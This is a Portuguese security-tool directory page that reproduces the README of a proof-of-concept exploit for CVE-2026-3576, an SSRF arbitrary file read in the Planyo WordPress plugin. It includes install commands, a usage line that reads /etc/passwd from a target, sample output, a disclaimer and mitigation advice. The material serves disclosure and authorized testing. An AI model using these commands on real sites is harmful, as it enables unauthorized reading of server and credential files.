Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-3576 — Exploit de prova de conceito para CVE-2026-3576 | Kitploit
Ferramentas/GitHubGitHub/anirbala98/cve-2026-3576
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

Exploit de prova de conceito para CVE-2026-3576

Ver Repositório
2113há 12 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-3576 - Plugin Wordpress Planyo Online Reservation System <= 3.0 - Leitura Arbitrária de Arquivos via SSRF

Este repositório contém uma Prova de Conceito (PoC) baseada em Python para o CVE-2026-3576. Ela também pode ser encontrada no Exploit-DB aqui.

Também desenvolvi um módulo Metasploit para este exploit, que pode ser encontrado aqui.

Aviso Legal

Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão de testar.

Visão Geral

Existe uma vulnerabilidade de Server Side Request Forgery (SSRF) no plugin Planyo Online Reservation System para wordpress anterior à versão 3.1. Ela permite que um atacante não autenticado forneça uma URL file:// por meio do parâmetro ulap_url, resultando em acesso arbitrário a arquivos.

Um artigo detalhado com análise de código-fonte e demonstração do exploit pode ser encontrado no meu blog Medium.

Versão Afetada

Baixar ferramenta
ComponenteVersão
Plugin vulnerável<=3.0
Plugin corrigido3.1

Requisitos

  • Python 3.13.14
  • Requests 2.32.5

Instalação

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -f <local do arquivo> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Exemplo

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Verificando se o alvo é vulnerável...
[+] Versão encontrada: 2.9
[+] O alvo é vulnerável

[*] Tentando ler arquivo arbitrário...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Mitigação

Atualize o plugin para a versão 3.1.

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3